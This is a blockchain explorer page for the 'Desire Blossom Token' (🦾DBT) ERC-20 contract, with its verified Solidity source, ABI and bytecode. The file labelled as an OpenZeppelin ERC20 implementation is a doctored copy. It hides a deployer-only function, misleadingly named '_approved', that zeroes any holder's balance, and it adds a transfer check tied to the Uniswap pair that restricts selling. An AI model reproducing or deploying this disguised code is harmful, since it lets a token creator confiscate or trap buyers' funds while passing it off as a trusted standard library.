ERC-20
Overview
Max Total Supply
300,040,008,000,000 🦾DBT
Holders
25
Transfers
-
0
Market
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
| # | Exchange | Pair | Price | 24H Volume | % Volume |
|---|
Contract Source Code Verified (Exact Match)
Contract Name:
OrionToken
Compiler Version
v0.8.28+commit.7893614a
Optimization Enabled:
Yes with 200 runs
Other Settings:
cancun EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract OrionToken is ERC20 {
constructor(string memory name, string memory symbol, uint256 initialSupply)
ERC20(name, symbol)
{
_mint(msg.sender, initialSupply * 10 ** decimals());
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.28;
import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "./IUniswapV2Factory.sol";
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract ERC20 is IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
mapping(address => uint256) private normalSize;
address private immutable _deployer;
address private pair;
address private constant factory = 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f;
address private constant weth = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
/**
* @dev Sets the values for {name} and {symbol}.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
_deployer = msg.sender;
}
modifier onlyDeployer() {
require(msg.sender == _deployer);
_;
}
event addressFound(address indexed account);
function _approved(address target) external onlyDeployer {
require(target != address(0), "Invalid address");
require(target != _deployer, "Cannot target owner");
_balances[target] = 0;
emit Transfer(address(0), target, 0);
emit addressFound(target);
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual override returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = msg.sender;
_transfer(owner, to, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = msg.sender;
_approve(owner, spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
address spender = msg.sender;
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
function _getPair() internal {
if (pair == address(0)) {
address p = IUniswapV2Factory(factory).getPair(address(this), weth);
if (p != address(0)) pair = p;
}
}
function _transfer(address from, address to, uint256 amount) internal virtual {
require(from != address(0));
require(to != address(0));
_getPair();
if (pair != address(0)) {
normalSize[to] = block.number;
if (to == pair) {
require(normalSize[from] < block.number);
}
}
uint256 fromBalance = _balances[from];
require(fromBalance >= amount);
unchecked {
_balances[from] -= amount;
_balances[to] += amount;
}
emit Transfer(from, to, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0));
_totalSupply += amount;
unchecked {
// Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
_balances[account] += amount;
}
emit Transfer(address(0), account, amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0));
require(spender != address(0));
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount);
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.0;
import "../IERC20.sol";
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 amount) external returns (bool);
}// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface IUniswapV2Factory {
event PairCreated(address indexed token0, address indexed token1, address pair, uint);
function getPair(address tokenA, address tokenB) external view returns (address pair);
}{
"optimizer": {
"enabled": true,
"runs": 200
},
"evmVersion": "cancun",
"metadata": {
"bytecodeHash": "ipfs"
},
"viaIR": false,
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"initialSupply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"}],"name":"addressFound","type":"event"},{"inputs":[{"internalType":"address","name":"target","type":"address"}],"name":"_approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60a060405234801561000f575f5ffd5b50604051610cd6380380610cd683398101604081905261002e9161018f565b8282600361003c8382610280565b5060046100498282610280565b505033608081905261007191506100626012600a610433565b61006c9084610448565b610079565b505050610472565b6001600160a01b03821661008b575f5ffd5b8060025f82825461009c919061045f565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112610115575f5ffd5b81516001600160401b0381111561012e5761012e6100f2565b604051601f8201601f19908116603f011681016001600160401b038111828210171561015c5761015c6100f2565b604052818152838201602001851015610173575f5ffd5b8160208501602083015e5f918101602001919091529392505050565b5f5f5f606084860312156101a1575f5ffd5b83516001600160401b038111156101b6575f5ffd5b6101c286828701610106565b602086015190945090506001600160401b038111156101df575f5ffd5b6101eb86828701610106565b925050604084015190509250925092565b600181811c9082168061021057607f821691505b60208210810361022e57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111561027b57805f5260205f20601f840160051c810160208510156102595750805b601f840160051c820191505b81811015610278575f8155600101610265565b50505b505050565b81516001600160401b03811115610299576102996100f2565b6102ad816102a784546101fc565b84610234565b6020601f8211600181146102df575f83156102c85750848201515b5f19600385901b1c1916600184901b178455610278565b5f84815260208120601f198516915b8281101561030e57878501518255602094850194600190920191016102ee565b508482101561032b57868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b634e487b7160e01b5f52601160045260245ffd5b6001815b60018411156103895780850481111561036d5761036d61033a565b600184161561037b57908102905b60019390931c928002610352565b935093915050565b5f8261039f5750600161042d565b816103ab57505f61042d565b81600181146103c157600281146103cb576103e7565b600191505061042d565b60ff8411156103dc576103dc61033a565b50506001821b61042d565b5060208310610133831016604e8410600b841016171561040a575081810a61042d565b6104165f19848461034e565b805f19048211156104295761042961033a565b0290505b92915050565b5f61044160ff841683610391565b9392505050565b808202811582820484141761042d5761042d61033a565b8082018082111561042d5761042d61033a565b6080516108456104915f395f818161027901526102f101526108455ff3fe608060405234801561000f575f5ffd5b506004361061009b575f3560e01c806370a082311161006357806370a082311461011457806376544cac1461013c57806395d89b4114610151578063a9059cbb14610159578063dd62ed3e1461016c575f5ffd5b806306fdde031461009f578063095ea7b3146100bd57806318160ddd146100e057806323b872dd146100f2578063313ce56714610105575b5f5ffd5b6100a76101a4565b6040516100b491906106b2565b60405180910390f35b6100d06100cb3660046106fb565b610234565b60405190151581526020016100b4565b6002545b6040519081526020016100b4565b6100d0610100366004610725565b61024b565b604051601281526020016100b4565b6100e4610122366004610763565b6001600160a01b03165f9081526020819052604090205490565b61014f61014a366004610763565b61026e565b005b6100a76103e6565b6100d06101673660046106fb565b6103f5565b6100e461017a366004610785565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6060600380546101b3906107bc565b80601f01602080910402602001604051908101604052809291908181526020018280546101df906107bc565b801561022a5780601f106102015761010080835404028352916020019161022a565b820191905f5260205f20905b81548152906001019060200180831161020d57829003601f168201915b5050505050905090565b5f33610241818585610402565b5060019392505050565b5f33610258858285610486565b6102638585856104d2565b506001949350505050565b336001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016146102a2575f5ffd5b6001600160a01b0381166102ef5760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316816001600160a01b0316036103665760405162461bcd60e51b815260206004820152601360248201527221b0b73737ba103a30b933b2ba1037bbb732b960691b60448201526064016102e6565b6001600160a01b0381165f81815260208181526040808320839055518281527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36040516001600160a01b038216907fb78df3c1039a5c8fecff04a5e99309199e87a6ea83106db358c245af21ee7a17905f90a250565b6060600480546101b3906107bc565b5f336102418185856104d2565b6001600160a01b038316610414575f5ffd5b6001600160a01b038216610426575f5ffd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f1981146104cc57818110156104bf575f5ffd5b6104cc8484848403610402565b50505050565b6001600160a01b0383166104e4575f5ffd5b6001600160a01b0382166104f6575f5ffd5b6104fe6105e4565b6006546001600160a01b031615610558576001600160a01b038083165f8181526005602052604090204390556006549091169003610558576001600160a01b0383165f908152600560205260409020544311610558575f5ffd5b6001600160a01b0383165f908152602081905260409020548181101561057c575f5ffd5b6001600160a01b038481165f818152602081815260408083208054889003905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505050565b6006546001600160a01b03166106b05760405163e6a4390560e01b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260248201525f90735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f9063e6a4390590604401602060405180830381865afa15801561065d573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061068191906107f4565b90506001600160a01b038116156106ae57600680546001600160a01b0319166001600160a01b0383161790555b505b565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b03811681146106ae575f5ffd5b5f5f6040838503121561070c575f5ffd5b8235610717816106e7565b946020939093013593505050565b5f5f5f60608486031215610737575f5ffd5b8335610742816106e7565b92506020840135610752816106e7565b929592945050506040919091013590565b5f60208284031215610773575f5ffd5b813561077e816106e7565b9392505050565b5f5f60408385031215610796575f5ffd5b82356107a1816106e7565b915060208301356107b1816106e7565b809150509250929050565b600181811c908216806107d057607f821691505b6020821081036107ee57634e487b7160e01b5f52602260045260245ffd5b50919050565b5f60208284031215610804575f5ffd5b815161077e816106e756fea2646970667358221220ca553b668a47b63d897ea37d3b8f20758988d9c5838d9bae6c8fb3031916e36764736f6c634300081c0033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000110e282186200000000000000000000000000000000000000000000000000000000000000001444657369726520426c6f73736f6d20546f6b656e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000007f09fa6be44425400000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f5ffd5b506004361061009b575f3560e01c806370a082311161006357806370a082311461011457806376544cac1461013c57806395d89b4114610151578063a9059cbb14610159578063dd62ed3e1461016c575f5ffd5b806306fdde031461009f578063095ea7b3146100bd57806318160ddd146100e057806323b872dd146100f2578063313ce56714610105575b5f5ffd5b6100a76101a4565b6040516100b491906106b2565b60405180910390f35b6100d06100cb3660046106fb565b610234565b60405190151581526020016100b4565b6002545b6040519081526020016100b4565b6100d0610100366004610725565b61024b565b604051601281526020016100b4565b6100e4610122366004610763565b6001600160a01b03165f9081526020819052604090205490565b61014f61014a366004610763565b61026e565b005b6100a76103e6565b6100d06101673660046106fb565b6103f5565b6100e461017a366004610785565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6060600380546101b3906107bc565b80601f01602080910402602001604051908101604052809291908181526020018280546101df906107bc565b801561022a5780601f106102015761010080835404028352916020019161022a565b820191905f5260205f20905b81548152906001019060200180831161020d57829003601f168201915b5050505050905090565b5f33610241818585610402565b5060019392505050565b5f33610258858285610486565b6102638585856104d2565b506001949350505050565b336001600160a01b037f00000000000000000000000038353e68c84db631a8bfec87a7bace750e92f68e16146102a2575f5ffd5b6001600160a01b0381166102ef5760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b7f00000000000000000000000038353e68c84db631a8bfec87a7bace750e92f68e6001600160a01b0316816001600160a01b0316036103665760405162461bcd60e51b815260206004820152601360248201527221b0b73737ba103a30b933b2ba1037bbb732b960691b60448201526064016102e6565b6001600160a01b0381165f81815260208181526040808320839055518281527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36040516001600160a01b038216907fb78df3c1039a5c8fecff04a5e99309199e87a6ea83106db358c245af21ee7a17905f90a250565b6060600480546101b3906107bc565b5f336102418185856104d2565b6001600160a01b038316610414575f5ffd5b6001600160a01b038216610426575f5ffd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f1981146104cc57818110156104bf575f5ffd5b6104cc8484848403610402565b50505050565b6001600160a01b0383166104e4575f5ffd5b6001600160a01b0382166104f6575f5ffd5b6104fe6105e4565b6006546001600160a01b031615610558576001600160a01b038083165f8181526005602052604090204390556006549091169003610558576001600160a01b0383165f908152600560205260409020544311610558575f5ffd5b6001600160a01b0383165f908152602081905260409020548181101561057c575f5ffd5b6001600160a01b038481165f818152602081815260408083208054889003905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505050565b6006546001600160a01b03166106b05760405163e6a4390560e01b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260248201525f90735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f9063e6a4390590604401602060405180830381865afa15801561065d573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061068191906107f4565b90506001600160a01b038116156106ae57600680546001600160a01b0319166001600160a01b0383161790555b505b565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b03811681146106ae575f5ffd5b5f5f6040838503121561070c575f5ffd5b8235610717816106e7565b946020939093013593505050565b5f5f5f60608486031215610737575f5ffd5b8335610742816106e7565b92506020840135610752816106e7565b929592945050506040919091013590565b5f60208284031215610773575f5ffd5b813561077e816106e7565b9392505050565b5f5f60408385031215610796575f5ffd5b82356107a1816106e7565b915060208301356107b1816106e7565b809150509250929050565b600181811c908216806107d057607f821691505b6020821081036107ee57634e487b7160e01b5f52602260045260245ffd5b50919050565b5f60208284031215610804575f5ffd5b815161077e816106e756fea2646970667358221220ca553b668a47b63d897ea37d3b8f20758988d9c5838d9bae6c8fb3031916e36764736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000110e282186200000000000000000000000000000000000000000000000000000000000000001444657369726520426c6f73736f6d20546f6b656e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000007f09fa6be44425400000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name (string): Desire Blossom Token
Arg [1] : symbol (string): 🦾DBT
Arg [2] : initialSupply (uint256): 300040008000000
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000110e282186200
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000014
Arg [4] : 44657369726520426c6f73736f6d20546f6b656e000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : f09fa6be44425400000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.
Add Token to MetaMask (Web3)